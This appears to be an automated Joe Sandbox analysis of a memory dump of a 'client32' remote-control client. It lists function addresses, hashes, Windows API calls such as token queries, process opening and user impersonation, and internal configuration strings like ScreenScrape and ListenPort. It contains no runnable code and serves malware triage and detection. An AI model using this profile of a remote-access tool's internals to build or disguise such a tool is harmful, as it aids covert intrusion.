Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51

Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4

Strings

NSMWClass, xrefs: 110317AF
NSMWClass, xrefs: 110317C3
Client32, xrefs: 11031784

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
Opcode Fuzzy Hash: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99

Function 1109ED30 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0058BDA0,0058BDA0,0058BDA0,0058BDA0,0058BDA0,0058BDA0,0058BDA0,111EFB64,?,00000001,00000001), ref: 1109EDB0
EqualSid.ADVAPI32(?,0058BDA0,?,00000001,00000001), ref: 1109EDC3

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateEqualInitialize
String ID:
API String ID: 1878589025-0
Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791

Function 1102EBD0 Relevance: 252.2, APIs: 31, Strings: 112, Instructions: 1967windowthreadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

GetSystemMetrics.USER32(00002000), ref: 1102ED54
FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15

Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2

GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F

Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59

SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
CloseHandle.KERNEL32(00000000), ref: 1102EFF0
FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
LoadIconA.USER32(11000000,000004C1), ref: 1102F521
LoadIconA.USER32(11000000,000004C2), ref: 1102F531
DestroyCursor.USER32(00000000), ref: 1102F557
DestroyCursor.USER32(00000000), ref: 1102F568

Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3

GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
DispatchMessageA.USER32(?), ref: 11030136
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
CloseHandle.KERNEL32(00000000,110278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

wsprintfA.USER32 ref: 11030645

Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,B6DE5DE1,?,?,00000000), ref: 1112909A
Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE

Strings

Windows 8.1 x64, xrefs: 1102FF12
Info. Client running as user=%s, type=%d, xrefs: 1102EFA6
*StartupDelay, xrefs: 110300CC
UseNTSecurity, xrefs: 1103054E
ScreenScrape, xrefs: 1102F7D9, 1102F803, 1102F82D
Windows 98, xrefs: 1102FB9B
UseLegacyPrintCapture, xrefs: 1102FAE6
*BeepUsingSpeaker, xrefs: 1102FA1A
Bridge, xrefs: 1102F038
Windows 2008, xrefs: 1102FDB6
TraceIPC, xrefs: 1103069F
Windows 95, xrefs: 1102FB6A
Windows Millennium, xrefs: 1102FBCB
8zi, xrefs: 1102F4F1
Windows 8 x64, xrefs: 1102FE90
cl32main, xrefs: 1102EC03
istaService, xrefs: 1102EC6B
hClientRunning = %x, pid=%d (x%x), xrefs: 1102F025
DisableRequestHelp, xrefs: 1102F8BF, 1102F95D
NSMWControl32, xrefs: 11030792
Windows 2000, xrefs: 1102FC5B
Windows 2003 x64, xrefs: 1102FD18
Windows 7 x64, xrefs: 1102FE3A
Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 11030A84
DisableJoinClass, xrefs: 1102F88F, 1102F92D
*ScreenScrape, xrefs: 11030177, 110301C0, 110303E0
Windows 7, xrefs: 1102FE19
\Explorer.exe, xrefs: 1103099D
IsJPIK returned %d, isvistaservice %d, xrefs: 1102F3FD
AssertTimeout, xrefs: 1102F5E7
CLIENT32.CPP, xrefs: 1102ED9A, 1102F380
Windows 2003, xrefs: 1102FCB0
Windows NT, xrefs: 1102FC2E
Windows 8.1, xrefs: 1102FEEF
Error. Could not load transports - perhaps another client is running, xrefs: 110302F7
TracePriv, xrefs: 110300AA
DisableConsoleClient, xrefs: 1102F6EA, 1102F77F
RestartAfterError, xrefs: 1102F6B4
MiniDumpType, xrefs: 1102F605
8zi, xrefs: 1102ECD9, 1102ED75, 1102EF2B, 11030081, 110300F4, 110301A6, 11030304, 11030458, 110304CC, 1103061B, 1103074D, 11030780, 110307AF, 110307D8
TCPIP, xrefs: 11030743
*BeepSound, xrefs: 1102FA4D
Windows 2012 R2, xrefs: 1102FF3E
closed ok, xrefs: 1102EFE2
DisableJournal, xrefs: 1102F8D7, 1102F975
ShowKBEnable, xrefs: 1102F85D
AlwaysOnTop, xrefs: 11030423
Windows 2016, xrefs: 1102FFD4
client32, xrefs: 1102F15E, 1102F367, 1102F46E
UseIPC, xrefs: 1103066C
JPK, xrefs: 1102F2D5, 1102F39B
DisableTSAdmin, xrefs: 1102F702
_debug, xrefs: 110300AF
DisableAudioFilter, xrefs: 1102F753, 1102FB22
General, xrefs: 1102F5EC, 1102F6B9, 1102FA1F, 1102FA52
NeedsReinstall, xrefs: 1102F690
Unsupported Platform, xrefs: 1102F445
NSMWClassVista, xrefs: 1102ED05
View, xrefs: 1102F050, 1102F5A5, 1102F5BE, 1102F5D9
Windows 2012, xrefs: 1102FEC1
IsILS returned %d, isvistaservice %d, xrefs: 1102F23E
istaUI, xrefs: 1102EC86
Session shutting down, exiting..., xrefs: 1102ED5E
win8ui, xrefs: 1102F4C1
gClient.hNotifyEvent, xrefs: 1102ED9F
Windows CE, xrefs: 1102FFFF
Default, xrefs: 1103078B, 110307BA, 110307E3
Intel error "%s", xrefs: 1102F322
OS2, xrefs: 1102FC0D
DisableReplayMenu, xrefs: 1102F8A7, 1102F945
V12.10.20, xrefs: 11030034, 11030068
EnableSmartcardAuth, xrefs: 1103056F
Error. Wrong hardware. Terminating, xrefs: 1102F26D, 1102F430
Info. Trying to close client, xrefs: 1102EFB8
Windows 10, xrefs: 1102FF6D
Windows Ding.wav, xrefs: 1102FA82
Intel(r), xrefs: 1102F30C
DisableHelp, xrefs: 1102F9D5
V12.00.20, xrefs: 1103002D
Client, xrefs: 1102F044, 1102F695, 1102F71F, 1102F740, 1102F7AE, 1102F7C6, 1102F7DE, 1102F808, 1102F832, 1102F862, 1102F894, 1102F8AC, 1102F8C4, 1102F8DC, 1102F8F4, 1102F90C, 1102F932, 1102F94A, 1102F962, 1102F97A, 1102F992, 1102F9AA, 1102F9C2, 1102F9DA, 1102FAEB, 110300D1, 1103017C, 110301C5, 1103038E, 110303E5, 11030401, 11030428, 11030538, 11030553, 11030574, 11030671
DisableJournalMenu, xrefs: 1102F8EF, 1102F98D
Windows 2008 x64, xrefs: 1102FDE2
Windows XP x64, xrefs: 1102FCDF
NSMWClass, xrefs: 1102ED16, 1102EEF7, 1102EFF8, 1103062F
Windows Vista x64, xrefs: 1102FD7D
NSM.LIC, xrefs: 1102F078, 1102F11A
Audio, xrefs: 1102F758, 1102FB27
pcicl32, xrefs: 1102EEE4
NSA.LIC, xrefs: 1102F086
Windows XP Ding.wav, xrefs: 1102FA89
DisableAudio, xrefs: 1102F71A, 1102F73B, 1102F7A9, 1102F907, 1102F9A5
EnableSmartcardLogon, xrefs: 11030533
IKS.LIC, xrefs: 1102F096, 1102F09D, 1102F0C0
NSTWControl32, xrefs: 110307EA
*PriorityClass, xrefs: 110303FC
Windows 10 x64, xrefs: 1102FF9D
Windows XP, xrefs: 1102FC89
_debug, xrefs: 1102F4C6, 1102F60A, 110306A4
NSSWControl32, xrefs: 110307C1
Info. Client already running, pid=%d (x%x), xrefs: 1102EF56
*ListenPort, xrefs: 1103073E
Global\NSMWClassAdmin, xrefs: 1103063A
EnableGradientCaptions, xrefs: 1102F5A0, 1102F5B9, 1102F5D4
LSPloaded=%d, WFPloaded=%d, xrefs: 1102F66E
Windows Vista, xrefs: 1102FD4F
Error x%x reading nsm.lic, sesh=%d, xrefs: 1102F0E8
Windows 8, xrefs: 1102FE68
Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 110309E6
CabinetWClass, xrefs: 110308F7
NoFTWhenLoggedOff, xrefs: 1102F9BD
Ready, xrefs: 11030801
DisableRunplugin, xrefs: 1102F7C1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$8zi$8zi$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
API String ID: 372548862-569169014
Opcode ID: 91fab56315e831f2aca95f3e7cdc2754124a237dfb24a60e118655fec6969759
Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
Opcode Fuzzy Hash: 91fab56315e831f2aca95f3e7cdc2754124a237dfb24a60e118655fec6969759
Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56

Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

screenscrape, xrefs: 1102E4E8
ClientName, xrefs: 1102E6B5
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102E844, 1102E8C3
WTSQuerySessionInformationA, xrefs: 1102E56E
%session%, xrefs: 1102E89A
ts macaddr=%s, xrefs: 1102E5EC
18/11/16 11:28:14 V12.10F20, xrefs: 1102E98E
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102E5C4
IsA(), xrefs: 1102E849, 1102E8C8
%sessionname%, xrefs: 1102E859, 1102E872
client32 dbi %hs, xrefs: 1102E993
MacAddress, xrefs: 1102E5FF
%s.%02d, xrefs: 1102E820
TSMode, xrefs: 1102E4B0
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102E9E0
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102E9BA
DisableConsoleClient, xrefs: 1102E437
8zi, xrefs: 1102E283, 1102E44A, 1102E761
TCPIP, xrefs: 1102E4D5
WTSFreeMemory, xrefs: 1102E631
Error x%x reading %s, sesh=%d, xrefs: 1102E381
$session$, xrefs: 1102E886
client32.ini, xrefs: 1102E325
Client, xrefs: 1102E4B5, 1102E4ED, 1102E604
, xrefs: 1102E685
NSMWClass, xrefs: 1102E2B4
NSM.LIC, xrefs: 1102E0F2
%02d, xrefs: 1102E808
Warning: Unexpanded clientname=<%s>, xrefs: 1102E7C3
Wtsapi32.dll, xrefs: 1102E4FC
ListenPort, xrefs: 1102E4D0
client32, xrefs: 1102E3F5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memsetwsprintf
String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$8zi$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 3802068140-2348258164
Opcode ID: eeddba07d7e6520cef25e5c7574d70c0732ba69d7c4c0694e1ffbbd3a2b399ab
Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
Opcode Fuzzy Hash: eeddba07d7e6520cef25e5c7574d70c0732ba69d7c4c0694e1ffbbd3a2b399ab
Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51

Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501

Strings

multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102E9E0
screenscrape, xrefs: 1102E4E8
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102E9BA
DisableConsoleClient, xrefs: 1102E437
ClientName, xrefs: 1102E6B5
8zi, xrefs: 1102E44A
TCPIP, xrefs: 1102E4D5
WTSQuerySessionInformationA, xrefs: 1102E56E
WTSFreeMemory, xrefs: 1102E631
ts macaddr=%s, xrefs: 1102E5EC
18/11/16 11:28:14 V12.10F20, xrefs: 1102E98E
Error x%x reading %s, sesh=%d, xrefs: 1102E381
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102E5C4
client32.ini, xrefs: 1102E325
Client, xrefs: 1102E4B5, 1102E4ED, 1102E604
, xrefs: 1102E685
client32 dbi %hs, xrefs: 1102E993
Wtsapi32.dll, xrefs: 1102E4FC
MacAddress, xrefs: 1102E5FF
ListenPort, xrefs: 1102E4D0
TSMode, xrefs: 1102E4B0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $18/11/16 11:28:14 V12.10F20$8zi$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1029625771-2953939820
Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

Function 11030EF3 Relevance: 44.1, APIs: 10, Strings: 15, Instructions: 350
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32 ref: 11030F12
RegCloseKey.KERNEL32(?), ref: 11031037

Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912

GetStockObject.GDI32(0000000D), ref: 110312E6
GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
InterlockedExchange.KERNEL32(00698CC8,00001388), ref: 110313BA
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC

Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0

Strings

*, xrefs: 11031381
, xrefs: 110313C2
8zi, xrefs: 110312D6
8zi, xrefs: 110312DD
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 11030EFE
CurrentVersion, xrefs: 11030F35
.%d, xrefs: 110313F6
Error %s unloading audiocap dll, xrefs: 11031603
3, xrefs: 11031066
CurrentMajorVersionNumber, xrefs: 11030FCD
&, xrefs: 11031585
CurrentMinorVersionNumber, xrefs: 11031000
j, xrefs: 11031341
j0U, xrefs: 11031554
pcicl32, xrefs: 110314C5

Memory Dump Source

